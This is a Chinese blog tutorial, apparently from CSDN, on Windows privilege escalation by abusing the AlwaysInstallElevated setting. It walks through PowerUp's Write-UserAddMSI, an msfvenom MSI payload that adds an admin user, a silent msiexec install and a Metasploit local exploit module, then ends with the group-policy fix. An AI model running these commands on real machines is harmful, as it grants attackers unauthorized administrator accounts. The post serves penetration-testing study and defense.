PowerSploit PowerUp模块提权

最新推荐文章于 2024-05-10 18:21:31 发布
最新推荐文章于 2024-05-10 18:21:31 发布
阅读量926 收藏 1
点赞数 6
分类专栏: 工具 提权 文章标签: 安全 内网渗透 渗透测试 提权 power shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45924653/article/details/107093477
版权

在这里插入图片描述

PowerSploit

PowerSploit是基于PowerShell的后渗透框架包含很多Powershell攻击脚本,它们主要用于渗透中的信息侦察、权限提升、权限维持。
GitHub下载:https://github.com/PowerShellMafia/PowerSpoloit

PowerUp

PowerUp是Privesc模块下的脚本功能强大,多用来寻找目标主机windows服务漏洞进行提权的实用脚本。
此实战中使用了Get-RegistryAlwaysInstallElevated两个模块。
检查注册表的设置,如果注册表设置就意味着MSI可以被管理员权限运行。

powershell -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString('c:/PowerUp.ps1');Get-RegistryAlwaysInstallElevated

检查注册表
添加用户使用Write-UserAddMSI模块,会产生MSI文件。
产生MSI文件
普通用户权限运行就可以添加账户
backdoor用户成功添加。
在这里插入图片描述
查看管理员组是否有我们添加的用户
在这里插入图片描述backdoor已经是管理员组的成员了

msf

使用msf也可以产生同样的效果
使用msfvenmo生成MSI的payload

msfvenom -p windows/adduser USER=clay PASS=0X7779@ss! -f msi > /tmp/add.msi

在这里插入图片描述使用meterpreter将payload上传
在这里插入图片描述
msiexec常用参数

  • /i 安装或配置产品
  • /x卸载产品
  • /quiet安静模式,无用户交互
  • /q 【n】无用户界面 【b】基本页面【r】精简页面【f】完整页面
  • /morestart安装完成后不重新启动

shell下执行

msiexec /i /qn /quiet c:\add.msi

在这里插入图片描述clay用户成功添加

自动化模块

在msf下有自动化模块可以使用

use exploit/windows/local/always_install_elevated

在这里插入图片描述获得了两个会话
在这里插入图片描述

防御措施

此漏洞是因为用户开启了Windows Installer特权安装功能。

方法

运行中 gpedit.msc 打开本地组策略编辑器
组策略中–计算机配置–管理模板–windows组件–windows Installer 永远以高特权进行安装:已启用
组策略中–计算机配置–用户配置–windows组件–windows Installer 永远以高特权进行安装:已启用

对照攻击方法进行防御,只要关闭AlwaysInstallElevated可以阻止他人利用MSI文件进行提权。

人生漫漫其修远兮,网安无止境。
一同前行,加油!

c7ay.
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ 红队知识库 ] Windows & Linux 下常用的提权扫描辅助工具(含工具下载链接及使用介绍)
qq_51577576的博客
03-16 683
[ 红队知识库 ] Windows & Linux 下常用的提权扫描辅助工具(含工具下载链接及使用介绍)
Windows 提权
weixin_45253622的博客
01-17 4202
Windows 提权 文章目录Windows 提权1.系统内核溢出漏洞提权2.系统配置错误提权2.1 错误权限配置2.2 计划任务提权:2.3 可信任服务路径漏洞2.4 不安全的注册表权限配置2.5 启用注册表键 AlwaysInstallElevated3.组策略首选项提权4.bypassUAC提权5.令牌窃取6.数据库提权MSSQL提权:MYSQL提权MOF提权UDF提权各种CVE7.其他手法 1.系统内核溢出漏洞提权 利用系统本身存在的一些系统内核溢出漏洞,未打相应的补丁,攻击者通过对比systemi
【CS学习笔记】14、powerup提权方法
TeamsSix 的 CSDN 空间
07-23 1773
0x00 介绍 PowerUp 所做的事是寻找可能存在弱点的地方,从而帮助提权。 利用 PowerUp 进行提权需要首先导入 ps1 文件powershell-import PowerUp.ps1,再执行powershell Invoke-AllChecks命令,使用 PowerUp 脚本可以快速的帮助我们发现系统弱点,从而实现提权的目的。 其中PowerUp.ps1文件可从这里下载:https://github.com/PowerShellMafia/PowerSploit/tree/master/Pr
提权
huanongying131的博客
07-08 313
DWORD SetPrivilege( LPCTSTR lpszPrivilege = SE_DEBUG_NAME, BOOL bEnablePrivilege = TRUE) { DWORD dwError = ERROR_SUCCESS; HANDLE hToken = NULL; if (IS_FALSE(::OpenProcessToken( ::GetCurrentPro...
155.网络安全渗透测试—[Cobalt Strike系列]—[权限提升/BypassUAC提权/MS14-058提权/PowerUp提权/MSF提权]
qwsn
03-28 1063
一、权限提升 1、BypassUAC 提权 2、CVE-2014-4113(MS14-058)提权 3、powerup 提权:服务权限配置不当 4、MSF 利用服务权限配置不当模块提权 二、提权测试 1、实验环境 2、BypassUAC提权 2、MS14-058提权 3、powerup提权:服务配置不当
CobaltStrike使用-第五篇(Bypass UAC、CVE提权Powerup提权
Love&Share
12-05 5139
前四篇文章介绍了CS的基本使用方法模块,以及钓鱼攻击的方法,本篇将会介绍使用CS进行提权操作 文章目录权限提升Bypass UACCVE提权PowerUp凭证和哈希获取Beacon 中的 Mimikatz 权限提升 在主机上线后,当某些操作需要管理员权限,而当前用户权限只有一般用户权限时,就需要提权操作了 自 Windows vista 开始,Windows 系统引进了用户账户控制机制,即 UACUser Account Control机制,UAC 机制在 Win 7中得到了完善。UAC 与 UNIX .
系统提权之:Windows 提权
f_carey的博客
11-04 2187
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 提权1 利用漏洞提权1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误提权2.1 系统服务权限配置错误2.1.1 利用 Po.
Powershell攻击指南1——PowerSploit
willow_liang的博客
12-05 1539
1.1PowerShell技术 灵活且能功能化管理Windows系统,一旦攻击者可以在计算机上执行代码,就可下载powershell脚本(.ps1)到磁盘中执行,甚至可以直接在内存中执行。 常用的powershell攻击工具: PowerSploit: 这是众多owehShe攻击工具中被广泛使用的PoweShel后期漏洞利用框架,常用于信息探测、特权提升、凭证窃取、持久化等操作。 Nishang:基于PowerShell渗透测试专用工具,集成了框架、脚本和各种Payload,包含下载和执行、键盘记
PowerShell工具之Powerup详解实录
冰河的专栏
01-08 6543
0×01. Powerup简介 Powerup是本地特权提升的一些调用方法,功能相当强大,拥有众多实用的脚本来帮助我们寻找目标主机Windows服务漏洞进行提权,也是 PowerShell Empire和PowerSploit 的一部分。 通常,在Windows下面我们可以通过内核漏洞来提升权限,但是,我们常常会碰到所处服务器通过内核漏洞提权是行不通的,这个时候,我们就需要通过脆弱的Windo...
Cobalt Strike权限提升
yyj1781572的博客
11-18 1233
Cobalt Strike权限提升
内网渗透基石篇--权限提升(上)
最新发布
qkh1234567的博客
05-10 772
本文主要从内网权限提升出发,主要介绍一些低权限用户如何通过一些工具和脚本来获取一些高权限。中间介绍了一些脚本和工具的使用,还做了几个实验来理解这些工具。黑客&网络安全如何学习。
windows提权
qq_38675102的博客
12-31 2268
windwos提权自学笔记-保持更新
PowerShell 另类提权,win10测试通过,已绕过UAC!
逆向思维
05-31 1万+
在乌云上看了一篇关于”非常规提权”的做法,试了一下,效果不错.装载过来,顺便加上自己的代码段. 简洁点写,省去大部分,需要阅读原文的请去:http://drops.wooyun.org/tips/11989 0x00 简介通常,在Windows下面我们可以通过内核漏洞来提升权限,但是,我们常常会碰到所处服务器通过内核漏洞提权是行不通的,这个时候,我们就需要通过脆弱的Windows服务提权
牛掰了!黑客手中的利器-Windows提权小结
weixin_55551408的博客
03-19 673
本节主要针对Windows操作系统下的权限提升进行介绍,提权是后渗透重要的一环节,在权限较低的情况下,站在攻击者的视角进行内部网络安全测试、系统安全测试、应用安全测试等方面会出现“束缚”,所测试出的质量与结果也会不同。本文基于Win操作系统下分别从内核漏洞、权限配置、DLL注入、注册表等方面展开介绍,其中包含漏洞本身的介绍、漏洞复现过程等内容的展现。该提权内容的阅读没有前后顺序,可根据读者自身所需进行全文阅读或某方向内容的阅读。 提权背景 权限提升意味着用户获得不允许他使用的权限。比如从一个普通用户,通
渗透测试——提权方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行提权提权的方式有哪些) 1.、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
渗透测试提权指南
遇事不决冲冲冲
12-04 7494
windows系统提权 参考内网安全攻防:渗透测试实战指南(百度百科) 一.系统内核漏洞 利用已存在未安装补丁的漏洞进行提权 参考Windows系统内核溢出漏洞提权 1.手动寻找缺失补丁 拿到权限后通过如下命令查看系统安装了哪些补丁 systeminfo wmic qfe get caption,description,hotfixid,installedon 比CMD更强大的命令行:WMIC后渗透利用(系统命令) 通过没有列出的补丁号,寻找相应的提权EXP进行提权(挺离谱的感觉) 系统漏洞与对应的
PowerUp攻击模块
weixin_46104215的博客
11-17 835
poweUp 是 Privesc 模块下的脚本,拥有众多用来寻找目标主机 Windows 服务漏洞进行提权的实用脚本 通常,在 Windows 下可以通过内核漏洞来提升权限,但是,可能会碰到无法通过内核漏洞提权所处服务器的情况,这个时候就需要利用脆弱的 Windows 服务提权,或者利用常见的系统服务,通过其继承的系统权限来完成提权等,此框架可以在内核提权不行的时候,帮助寻找服务器的弱点,进而通过脆弱点实现提权的目的 ...
PowerSploit中的Powerup攻击模块
gclome的博客
07-29 720
《web安全攻防》学习笔记 Powerup是Privesc模块下的一个脚本,功能相当强大,拥有众多用来寻找目标主机windows服务漏洞进行提权的实用脚本 首先我们来看下Powerup下都有哪些模块,如下图所示。 把PowerUp脚本模块加载到本机,就可以直接输入Import-Module 命令加载PowerUp脚本模块 更改执行策略 PS C:\Windows\system32> Set-ExecutionPolicy Unrestricted PS C:\Windows\system32>
powergui模块报错
07-12
您好!对于powergui模块报错的问题,我需要更多的详细信息才能帮助您解决。请提供以下信息: 1. 您遇到的具体错误消息是什么?请提供完整的错误信息。 2. 您使用的是哪个版本的powergui模块? 3. 您在使用powergui模块时执行了哪些操作?请提供相关的代码片段或步骤。 4. 您的操作系统是什么版本?您使用的是哪个版本的PowerShell? 提供这些信息将有助于我更好地理解和解决您的问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值